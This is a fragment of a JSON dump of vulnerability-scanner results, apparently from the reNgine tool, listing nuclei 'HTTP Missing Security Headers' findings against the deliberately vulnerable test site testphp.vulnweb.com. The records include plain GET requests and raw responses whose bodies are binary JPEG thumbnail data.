href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 981, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:42.519Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 982, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:42.804Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� 